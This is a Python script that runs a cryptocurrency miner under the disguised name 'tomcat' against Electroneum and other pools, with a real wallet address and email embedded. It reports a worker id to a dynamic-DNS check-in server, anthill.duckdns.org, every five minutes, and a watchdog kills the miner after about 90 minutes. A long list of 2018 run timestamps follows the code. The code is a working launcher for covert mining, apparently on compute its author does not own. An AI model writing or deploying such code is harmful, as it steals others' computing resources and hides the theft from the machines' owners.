import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:01:06.524019
#2018-02-17 16:47:07.209528
#2018-02-17 18:35:05.027216
#2018-02-17 20:23:02.113376
#2018-02-17 22:10:04.755279
#2018-02-17 23:53:06.554310
#2018-02-18 01:43:06.944172
#2018-02-18 03:31:05.401082
#2018-02-18 05:18:05.942871
#2018-02-18 07:10:08.853644
#2018-02-18 08:58:06.630311
#2018-02-18 10:45:06.525418
#2018-02-18 12:32:04.564105
#2018-02-18 14:19:02.036970
#2018-02-18 16:09:07.905475
#2018-02-18 17:59:05.197818
#2018-02-18 19:46:07.477493
#2018-02-18 21:33:05.686275
#2018-02-18 23:22:03.811153
#2018-02-19 01:08:07.227019
#2018-02-19 02:54:01.931472
#2018-02-19 04:40:06.217258
#2018-02-19 06:24:04.147519
#2018-02-19 08:13:05.257275
#2018-02-19 10:02:07.944833
#2018-02-19 11:52:08.465008
#2018-02-19 13:40:07.823603
#2018-02-19 15:28:01.270146
#2018-02-19 17:16:01.762983
#2018-02-19 19:04:01.480813
#2018-02-19 20:50:04.368991
#2018-02-19 22:37:04.497158
#2018-02-20 00:21:05.681245
#2018-02-20 02:08:05.262705
#2018-02-20 03:57:05.334756
#2018-02-20 05:42:01.419316
#2018-02-20 07:28:01.484687
#2018-02-20 09:13:01.404145
#2018-02-20 10:55:09.442699
#2018-02-20 12:43:05.296694
#2018-02-20 14:28:10.787042
#2018-02-20 16:14:02.019016
#2018-02-20 18:01:06.389671
#2018-02-20 19:52:04.386717
#2018-02-20 21:39:01.679512
#2018-02-20 23:22:08.267472
#2018-02-21 01:07:06.246973
#2018-02-21 02:55:05.576894
#2018-02-21 04:43:03.524576
#2018-02-21 06:33:01.579042
#2018-02-21 08:18:06.430003
#2018-02-21 10:05:06.390323
#2018-02-21 11:52:07.471281
#2018-02-21 13:44:10.126125
#2018-02-21 15:28:06.015219
#2018-02-21 17:20:01.956968
#2018-02-21 19:07:06.623785
#2018-02-21 20:55:06.519624
#2018-02-21 22:39:08.228500
#2018-02-22 00:28:08.361935
#2018-02-22 02:17:01.421675
#2018-02-22 04:02:07.764137
#2018-02-22 05:48:07.789007
#2018-02-22 07:33:06.122578
#2018-02-22 09:21:05.881885
#2018-02-22 11:07:05.794172
#2018-02-22 12:52:06.695364
#2018-02-22 14:39:11.413710
#2018-02-22 16:25:01.664808
#2018-02-22 18:11:01.727206
#2018-02-22 19:59:06.417090
#2018-02-22 21:48:08.235292
#2018-02-22 23:35:09.293165
#2018-02-23 01:23:04.547278
#2018-02-23 03:10:07.823298
#2018-02-23 04:58:04.845987
#2018-02-23 06:42:07.652316
#2018-02-23 08:32:04.424775
#2018-02-23 10:45:11.310822
#2018-02-23 12:42:02.259564
#2018-02-23 14:25:10.922219
#2018-02-23 16:17:01.400742
#2018-02-23 18:03:08.331876
#2018-02-23 19:48:05.471676
#2018-02-23 21:32:06.796002
#2018-02-23 23:20:01.491862
#2018-02-24 01:09:06.709380
#2018-02-24 03:01:07.458312
#2018-02-24 04:49:01.561883
#2018-02-24 06:33:07.872495
#2018-02-24 08:22:07.054779
#2018-02-24 10:06:03.157624
#2018-02-24 12:04:05.023301
#2018-02-24 13:52:04.138253
#2018-02-24 15:42:04.951865
#2018-02-24 17:35:08.416511
#2018-02-24 19:09:01.541085
#2018-02-24 20:41:04.725767
#2018-02-24 22:20:08.156478
#2018-02-25 00:57:07.474393
#2018-02-25 02:54:04.072964
#2018-02-25 06:31:01.532885